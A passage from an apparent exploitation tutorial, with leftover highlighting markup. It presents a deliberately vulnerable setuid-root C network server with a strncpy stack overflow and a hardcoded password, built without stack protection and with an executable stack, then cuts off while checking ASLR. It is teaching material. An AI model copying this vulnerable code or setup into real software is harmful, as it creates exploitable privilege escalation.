/spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;strings.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"span class="cp"#define CNUM 58623/span/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"span class="cp"#define TFILE quot;tokenquot;/span/span span class="code-line"span class="cp"#define PORT 9999/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[]);/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendtoken/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"listenfd/spanspan class="p",/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"servaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"socklen_t/spanspan class="w" /spanspan class="n"clilen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"pid_t/spanspan class="w" /spanspan class="n"childpid/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="mi"1000/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listenfd/spanspan class="o"=/spanspan class="n"socket/spanspan class="p"(/spanspan class="n"AF_INET/spanspan class="p",/spanspan class="n"SOCK_STREAM/spanspan class="p",/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"bzero/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_family/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"AF_INET/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_addr/spanspan class="p"./spanspan class="n"s_addr/spanspan class="o"=/spanspan class="n"htonl/spanspan class="p"(/spanspan class="n"INADDR_ANY/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_port/spanspan class="o"=/spanspan class="n"htons/spanspan class="p"(/spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"bind/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p")))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error: Unable to bind to port %d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listen/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",/spanspan class="mi"1024/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="p"(;;)/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"clilen/spanspan class="o"=/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"connfd/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"accept/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"recvfrom/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p",/spanspan class="w" /spanspan class="mi"1000/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="n"n/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"5/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"senderror/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendtoken/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendfile/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Received the following:/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;%squot;/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"close/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[])/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;Wrong password: quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"16/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"p/spanspan class="p"),/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendtoken/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"TFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"TFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p",/spanspan class="w" /spanspan class="n"i/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"atoi/spanspan class="p"(/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="n"CNUM/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"5/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe main difference here is that the input is converted to a number and if that number is equal to code58623/code, the contents of a different file (codetoken/code) is sent to the client./p h3The Fix/h3 pThe fix is the same as in part 3. The vulnerable code is the call to strncpy on line 102./p h2Setting Up The Environment/h2 pThe environment is going to be exactly the same as in part 3, except we have a new file and ASLR will be enabled./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanadduser appuser/span span class="code-line"span class="go"Adding user `appuser#39; .../span/span span class="code-line"span class="go"Adding new group `appuser#39; (1002) .../span/span span class="code-line"span class="go"Adding new user `appuser#39; (1002) with group `appuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/appuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"[email protected]:~# /spanls/span span class="code-line"span class="go"app-net.c/span/span span class="code-line"span class="gp"[email protected]:~# /spangcc -z execstack -fno-stack-protector -o app-net app-net.c/span span class="code-line"span class="gp"[email protected]:~# /spancp app-net /home/appuser//span span class="code-line"span class="gp"[email protected]:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanchmod u+s app-net /span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spancat secret.txt /span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanspan class="nb"echo/span span class="s2"quot;084934-3492048234728-4847847quot;/span gt; token/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l token /span span class="code-line"span class="go"-rw-r--r-- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanchmod span class="m"600/span token /span span class="code-line"span class="gp"[email protected]:/home/appuser# /spancat token /span span class="code-line"span class="go"084934-3492048234728-4847847/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spansu - appuser/span span class="code-line"span class="gp"[email protected]:~$ /spanls -l/span span class="code-line"span class="go"total 20/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="go"-rw------- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat secret.txt/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat token/span span class="code-line"span class="go"cat: token: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pThe big difference here is that we did not change the content of the file code/proc/sys/kernel/randomize_va_space/code, if the value of this wasn't 2, then run the following command to change it: codeecho 2 gt; /proc/sys/kernel/randomize_va_space/code/p pThis means that ASLR will be enabled. We can prove this by looking at the memory map of a process over multiple executions:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/span span class="code-line"span class="normal"77/span/span span class="code-line"span class="normal"78/span/span span class="code-line"span class="normal"79/span/span span class="code-line"span class="normal"80/span/span span class="code-line"span class="normal"81/span/span span class="code-line"span class="normal"82/span/span span class="code-line"span class="normal"83/span/span span class="code-line"span class="normal"84/span/span span class="code-line"span class="normal"85/span/span span class="code-line"span class="normal"86/span/span span class="code-line"span class="normal"87/span/span span class="code-line"span class="normal"88/span/span span class="code-line"span class="normal"89/span/span span class="code-line"span class="normal"90/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spancat /proc/self/maps/span span class="code-line"span class="go"08048000-08054000 r-xp 00000000 08:01 783374 /bin/cat/span/span span class="code-line"span class="go"08054000-08055000 